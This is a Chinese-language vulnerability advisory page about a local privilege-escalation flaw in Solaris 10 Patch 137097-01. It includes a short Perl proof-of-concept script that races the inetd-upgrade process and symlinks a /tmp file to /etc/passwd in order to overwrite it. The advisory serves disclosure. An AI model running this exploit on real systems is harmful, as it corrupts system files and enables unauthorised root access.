发布日期:2012-08-09
更新日期:2012-08-14受影响系统:
Oracle Solaris 10 x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54919Oracle Sun Solaris是一款商业性质的操作系统。Solaris 10 Patch 137097-01在实现上存在本地权限提升漏洞,本地攻击者可利用此漏洞在受影响计算机上获取提升的权限。<*来源:Larry Cashdollar
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Larry Cashdollar ()提供了如下测试方法:
#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";while(<ps>) {
@args = split " ", $_;if (/inetd-upgrade/) {
print "Symlinking iconf_entries.$args[1] to $clobber
";
symlink($clobber,"/tmp/iconf_entries.$args[1]");
exit(1);
}
}}建议:
--------------------------------------------------------------------------------
厂商补丁:Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.oracle.com/technetwork/topics/security/Amazon Kindle Touch多个安全漏洞McAfee FireWall Enterprise ISC BIND拒绝服务漏洞相关资讯 Solaris 本地权限提升漏洞 Solaris漏洞
- VMware虚拟机安装x86架构的Solaris (今 14:25)
- Oracle Sun Solaris 信息泄露漏洞( (01月22日)
- Solaris系统配置IPMP教程(基于IP (12/04/2014 13:40:32)
| - Oracle Sun Solaris 本地安全漏洞( (04月22日)
- Oracle Solaris本地安全漏洞(CVE- (07/17/2015 08:32:02)
- Oracle Solaris 远程安全漏洞(CVE- (10/17/2014 17:12:43)
|
本文评论 查看全部评论 (0)
易网时代-编程资源站